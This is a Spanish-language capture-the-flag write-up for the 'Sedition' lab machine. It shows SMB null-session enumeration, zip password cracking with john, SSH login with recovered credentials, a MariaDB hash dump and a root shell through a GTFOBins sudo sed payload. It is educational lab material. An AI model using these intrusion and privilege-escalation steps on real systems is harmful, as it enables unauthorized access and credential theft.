Post

Sedition - THL

Sedition - THL

Antes de empezar vamos a desplegar el laboratorio:

Está máquina solo es compatible con Virtualbox. Si quereís usar Vmware debereís de configurar la interfaz de red. Para obtener acceso al sistema podeís hacerlo por el GRUB.

Enumeration

Vamos a realizar un ping para confirmar la conectividad con el objetivo:

1
2
3
4
5
6
7
8
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> ping -c1 192.168.116.129
PING 192.168.116.129 (192.168.116.129) 56(84) bytes of data.
64 bytes from 192.168.116.129: icmp_seq=1 ttl=64 time=0.167 ms

--- 192.168.116.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.167/0.167/0.167/0.000 ms

Vamos a empezar por un escaneo nmap, en este caso indicaré a nmap que no quiero que compruebe si el host está activo ya que previamente hemos realizado el ping:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> nmap -p- --open -sS -n -Pn -vvv 192.168.116.129                   
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-14 13:00 +0200
Initiating ARP Ping Scan at 13:00
Scanning 192.168.116.129 [1 port]
Completed ARP Ping Scan at 13:00, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:00
Scanning 192.168.116.129 [65535 ports]
Discovered open port 139/tcp on 192.168.116.129
Discovered open port 445/tcp on 192.168.116.129
Discovered open port 65535/tcp on 192.168.116.129
Completed SYN Stealth Scan at 13:00, 0.71s elapsed (65535 total ports)
Nmap scan report for 192.168.116.129
Host is up, received arp-response (0.00051s latency).
Scanned at 2026-06-14 13:00:32 CEST for 1s
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE      REASON
139/tcp   open  netbios-ssn  syn-ack ttl 64
445/tcp   open  microsoft-ds syn-ack ttl 64
65535/tcp open  unknown      syn-ack ttl 64
MAC Address: 00:0C:29:0C:9F:42 (VMware)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Vamos a realizar un segundo escaneo para obtener más información sobre los servicios:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> nmap -p139,445,65535 -sCV 192.168.116.129                              
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-14 13:01 +0200
Nmap scan report for 192.168.116.129
Host is up (0.00022s latency).

PORT      STATE SERVICE     VERSION
139/tcp   open  netbios-ssn Samba smbd 4
445/tcp   open  netbios-ssn Samba smbd 4
65535/tcp open  ssh         OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey: 
|   256 32:ca:e5:d1:12:c2:1e:11:1e:58:43:32:a0:dc:03:ab (ECDSA)
|_  256 79:3a:80:50:61:d9:96:34:e2:db:d6:1e:65:f0:a9:14 (ED25519)
MAC Address: 00:0C:29:0C:9F:42 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2026-06-14T13:01:36
|_  start_date: N/A
|_nbstat: NetBIOS name: SEDITION, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: 1h59m58s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.90 seconds

Vemos que el puerto 65535 se trata de SSH. Vemos que nmap no nos da ninguna información interesante sobre el servicio SMB. Así que vamos a enumerarlo nosotros.

Primero con netexec vamos a comprobar si podemos usar una null session:

1
2
3
4
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> netexec smb 192.168.116.129 -u '' -p ''
SMB         192.168.116.129 445    SEDITION         [*] Unix - Samba (name:SEDITION) (domain:SEDITION) (signing:False) (SMBv1:None) (Null Auth:True)
SMB         192.168.116.129 445    SEDITION         [+] SEDITION\: 

Perfecto, podemos usar una null session. Vamos a listar los recursos compartidos con smbclient:

1
2
3
4
5
6
7
8
9
10
11
12
13
─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> smbclient -L //192.168.116.129/ -N

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        backup          Disk      
        IPC$            IPC       IPC Service (Samba Server)
        nobody          Disk      Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.116.129 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

Shell as cowboy

Vemos que hay un recurso compartido llamado backup , vamos a conectarnos a él:

1
2
3
4
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> smbclient //192.168.116.129/backup -N
Try "help" to get a list of possible commands.
smb: \> 

Vamos a hacer un ls para listar el contenido:

1
2
3
4
5
6
smb: \> ls
  .                                   D        0  Sun Jul  6 19:02:53 2025
  ..                                  D        0  Sun Jul  6 20:15:13 2025
  secretito.zip                       N      216  Sun Jul  6 19:02:31 2025

                19480400 blocks of size 1024. 16196084 blocks available

Vemos un archivo zip, vamos a descargarlo con GET:

1
2
smb: \> get secretito.zip 
getting file \secretito.zip of size 216 as secretito.zip (210.9 KiloBytes/sec) (average 210.9 KiloBytes/sec)

Vamos a intentar descomprimirlo:

1
2
3
4
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> unzip secretito.zip 
Archive:  secretito.zip
[secretito.zip] password password:

Desconocemos la contraseña, vamos a usar zip2john para obtener el hash del zip:

1
2
3
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> zip2john secretito.zip > hash_zip
ver 1.0 efh 5455 efh 7875 secretito.zip/password PKZIP Encr: 2b chk, TS_chk, cmplen=34, decmplen=22, crc=F2E5967A ts=969D cs=969d type=0

Vamos a usar john:

1
2
3
4
5
6
7
8
9
10
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> john -w=/usr/share/wordlists/rockyou.txt hash_zip 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sebastian        (secretito.zip/password)     
1g 0:00:00:00 DONE (2026-06-14 13:59) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Obtuvimos la contraseña sebastian. Vamos a descomprimir el zip:

1
2
3
4
5
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> unzip secretito.zip
Archive:  secretito.zip
[secretito.zip] password password: 
 extracting: password 

Vemos que nos ha dado un archivo llamado password, vamos a leer su contenido:

1
2
3
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> cat password 
elbunkermolagollon123

Obtuvimos la contraseña elbunkermolagollon123, pero desconocemos del usuario. Vamos a aprovechar que el servicio SMB está habilitado y podemos acceder como null session. Para ello nos conectaremos por RPC (Remote Procedure Call) vamos a usar rpcclient:

1
2
3
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> rpcclient -U '' 192.168.116.129 -N
rpcclient $> 

Vamos a ejecutar enumdomusers :

enumdomusers en RPC nos devuelve información sobre los usuarios existentes en el dominio.

1
2
rpcclient $> enumdomusers
user:[cowboy] rid:[0x3e8]

Vemos el usuario cowboy, vamos a probar las credenciales obtenidas con ese usuario:

1
2
3
4
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> netexec ssh 192.168.116.129 -u 'cowboy' -p 'elbunkermolagollon123' --port 65535
SSH         192.168.116.129 65535  192.168.116.129  [*] SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u6
SSH         192.168.116.129 65535  192.168.116.129  [+] cowboy:elbunkermolagollon123  Linux - Shell access!

Vamos a conectarnos por SSH:

SSH está configurado en el puerto 65535

1
2
3
4
5
6
7
8
9
10
11
12
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> sshpass -p 'elbunkermolagollon123' ssh cowboy@192.168.116.129 -p 65535
Linux Sedition 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 14 14:49:52 2026 from 192.168.116.130
cowboy@Sedition:~$

Shell as debian

Enumerando el home del usuario cowboy podremos encontrarnos el .bash_history:

1
2
3
4
5
6
cowboy@Sedition:~$ cat .bash_history 
history
exit
mariadb
mariadb -u cowboy -pelbunkermolagollon123
su debian

Vemos que anteriormente el usuario cowboy ha iniciado en el servicio MariaDB. Vamos a ver si está activo, para ello comprobaré si el puerto 3306 está activo:

1
2
cowboy@Sedition:~$ ss -anot | grep 3306
LISTEN 0      80           127.0.0.1:3306          0.0.0.0:* 

Bien vamos a conectarnos a MariaDB:

1
2
3
4
5
6
7
8
9
10
cowboy@Sedition:~$ mariadb -u cowboy -pelbunkermolagollon123
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 32
Server version: 10.11.11-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 

Vamos a enumerar bases de datos:

1
2
3
4
5
6
7
8
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| bunker             |
| information_schema |
+--------------------+
2 rows in set (0,001 sec)

Vemos la base de datos bunker vamos a ver sus tablas:

1
2
3
4
5
6
7
8
9
10
11
12
MariaDB [(none)]> use bunker;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [bunker]> show tables;
+------------------+
| Tables_in_bunker |
+------------------+
| users            |
+------------------+
1 row in set (0,000 sec)

Vamos a seleccionar todas las columnas de la tabla users:

1
2
3
4
5
6
7
MariaDB [bunker]> select * from users;
+--------+----------------------------------+
| user   | password                         |
+--------+----------------------------------+
| debian | 7c6a180b36896a0a8c02787eeafb0e4c |
+--------+----------------------------------+
1 row in set (0,000 sec)

Vemos que la contraseña está en MD5, vamos a pasarla por crackstation:

Vamos a escalar a debian:

1
2
3
cowboy@Sedition:~$ su debian
Contraseña: 
debian@Sedition:/home/cowboy$ 

Shell as root

Si vemos los permisos sudo del usuario debian podremos ver lo siguiente:

1
2
3
4
5
6
debian@Sedition:/home/cowboy$ sudo -l
Matching Defaults entries for debian on sedition:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User debian may run the following commands on sedition:
    (ALL) NOPASSWD: /usr/bin/sed

Podemos usar sed, buscando en GTFObins dan el siguiente payload:

1
sudo /usr/bin/sed -n '1e exec /bin/bash 1>&0' /etc/hosts

Vamos a probarlo:

1
2
3
4
debian@Sedition:/home/cowboy$ sudo /usr/bin/sed -n '1e exec /bin/bash 1>&0' /etc/hosts
root@Sedition:/home/cowboy# whoami; id
root
uid=0(root) gid=0(root) grupos=0(root)

This post is licensed under CC BY 4.0 by the author.